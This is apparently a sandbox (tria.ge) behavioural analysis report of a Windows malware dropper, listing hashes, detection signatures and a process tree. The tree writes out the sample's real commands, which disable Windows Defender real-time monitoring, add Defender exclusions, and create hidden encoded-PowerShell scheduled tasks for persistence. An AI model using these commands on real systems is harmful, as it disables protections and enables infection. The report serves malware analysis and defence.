Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    194s
  • max time network
    195s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    04/05/2024, 22:29

General

  • Target

    536726fca7351cb560f47d4a2c492f4cb641575caf2bde2abc90cf9a895962b1.exe

  • Size

    7.3MB

  • MD5

    7a1ffe789183610a329b46ae80799c00

  • SHA1

    a2e1b15ba3b4a6679cfc925b4efa5c309aa0ec25

  • SHA256

    536726fca7351cb560f47d4a2c492f4cb641575caf2bde2abc90cf9a895962b1

  • SHA512

    55a4390e3a12a629fc82fceb6858a8a3665824c2810a9b8bdb50460f4d342bf8447cc7225aa2ee3838a5311e15a09b3d3cedee54f22d5b71b06dd66bae04109a

  • SSDEEP

    196608:91OC03j2c4fUT40PSko/lxOAAl4yAWLQqF8AxFz:3OL3j8ko/e54yAyFjV

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\536726fca7351cb560f47d4a2c492f4cb641575caf2bde2abc90cf9a895962b1.exe
    "C:\Users\Admin\AppData\Local\Temp\536726fca7351cb560f47d4a2c492f4cb641575caf2bde2abc90cf9a895962b1.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2352
    • C:\Users\Admin\AppData\Local\Temp\7zS1258.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3064
      • C:\Users\Admin\AppData\Local\Temp\7zS140D.tmp\Install.exe
        .\Install.exe /feWvdidbUWf "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2572
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2288
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2740
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2644
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                  PID:2092
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2540
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2736
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  7⤵
                    PID:2460
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                5⤵
                  PID:2512
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                    6⤵
                      PID:2452
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                        7⤵
                          PID:2696
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                      5⤵
                        PID:2464
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                          6⤵
                            PID:2560
                            • \??\c:\windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                              7⤵
                                PID:2596
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                            5⤵
                              PID:1940
                              • C:\Windows\SysWOW64\cmd.exe
                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                6⤵
                                  PID:3068
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                    7⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Drops file in System32 directory
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2480
                                    • C:\Windows\SysWOW64\gpupdate.exe
                                      "C:\Windows\system32\gpupdate.exe" /force
                                      8⤵
                                        PID:2500
                              • C:\Windows\SysWOW64\forfiles.exe
                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                4⤵
                                  PID:2944
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                    5⤵
                                      PID:2984
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                        6⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in System32 directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3020
                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                          7⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2400
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /CREATE /TN "butYHpXTvMdZIJsEKZ" /SC once /ST 22:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\gvUvpqXuJGpWbAU\KVPDPJQ.exe\" LY /dXqdidSHVt 525403 /S" /V1 /F
                                    4⤵
                                    • Drops file in Windows directory
                                    • Creates scheduled task(s)
                                    PID:2792
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn butYHpXTvMdZIJsEKZ"
                                    4⤵
                                      PID:676
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C schtasks /run /I /tn butYHpXTvMdZIJsEKZ
                                        5⤵
                                          PID:2144
                                          • \??\c:\windows\SysWOW64\schtasks.exe
                                            schtasks /run /I /tn butYHpXTvMdZIJsEKZ
                                            6⤵
                                              PID:2780
                                  • C:\Windows\system32\taskeng.exe
                                    taskeng.exe {EBE82560-87A7-4908-A764-7CFE0FE2F3F5} S-1-5-18:NT AUTHORITY\System:Service:
                                    1⤵
                                      PID:2756
                                      • C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\gvUvpqXuJGpWbAU\KVPDPJQ.exe
                                        C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\gvUvpqXuJGpWbAU\KVPDPJQ.exe LY /dXqdidSHVt 525403 /S
                                        2⤵
                                        • Executes dropped EXE
                                        • Drops file in System32 directory
                                        • Modifies data under HKEY_USERS
                                        PID:500
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                          3⤵
                                            PID:1992
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                              4⤵
                                                PID:1284
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                  5⤵
                                                    PID:1764
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                      6⤵
                                                        PID:2028
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                    4⤵
                                                      PID:2024
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                        5⤵
                                                          PID:1676
                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                            6⤵
                                                              PID:2036
                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                          4⤵
                                                            PID:1984
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                              5⤵
                                                                PID:2076
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                  6⤵
                                                                    PID:2328
                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                4⤵
                                                                  PID:2172
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                    5⤵
                                                                      PID:2008
                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                        6⤵
                                                                          PID:2016
                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                      4⤵
                                                                        PID:2404
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                          5⤵
                                                                            PID:2408
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                              6⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Drops file in System32 directory
                                                                              • Modifies data under HKEY_USERS
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2744
                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                7⤵
                                                                                  PID:540
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /CREATE /TN "gVPgcwhco" /SC once /ST 19:46:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                          3⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:1420
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /run /I /tn "gVPgcwhco"
                                                                          3⤵
                                                                            PID:1748
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /DELETE /F /TN "gVPgcwhco"
                                                                            3⤵
                                                                              PID:864
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                              3⤵
                                                                                PID:1892
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                  4⤵
                                                                                  • Modifies Windows Defender Real-time Protection settings
                                                                                  PID:2504
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                3⤵
                                                                                  PID:572
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                    4⤵
                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                    PID:888
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  schtasks /CREATE /TN "gpZtkvKer" /SC once /ST 16:24:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                  3⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:1728
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  schtasks /run /I /tn "gpZtkvKer"
                                                                                  3⤵
                                                                                    PID:2104
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /DELETE /F /TN "gpZtkvKer"
                                                                                    3⤵
                                                                                      PID:2516
                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                                                      3⤵
                                                                                        PID:920
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                          4⤵
                                                                                            PID:2220
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                              5⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Drops file in System32 directory
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:2628
                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                6⤵
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2920
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:32
                                                                                          3⤵
                                                                                            PID:2400
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:32
                                                                                              4⤵
                                                                                              • Windows security bypass
                                                                                              PID:2096
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:64
                                                                                            3⤵
                                                                                              PID:1696
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:64
                                                                                                4⤵
                                                                                                • Windows security bypass
                                                                                                PID:3000
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:32
                                                                                              3⤵
                                                                                                PID:2936
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:32
                                                                                                  4⤵
                                                                                                    PID:2676
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:64
                                                                                                  3⤵
                                                                                                    PID:1976
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:64
                                                                                                      4⤵
                                                                                                        PID:2800
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /C copy nul "C:\Windows\Temp\mrYrpJCpOmktZWwz\WdDjMYNc\SPVvHlYWrpdFKHiO.wsf"
                                                                                                      3⤵
                                                                                                        PID:1700
                                                                                                      • C:\Windows\SysWOW64\wscript.exe
                                                                                                        wscript "C:\Windows\Temp\mrYrpJCpOmktZWwz\WdDjMYNc\SPVvHlYWrpdFKHiO.wsf"
                                                                                                        3⤵
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:2144
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1744
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1284
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1292
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2008
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1760
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1336
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1616
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:360
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:804
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1436
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1416
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2228
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1232
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2252
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2120
                                                                                                        • C:\Windows\SysWOW64\reg.exe
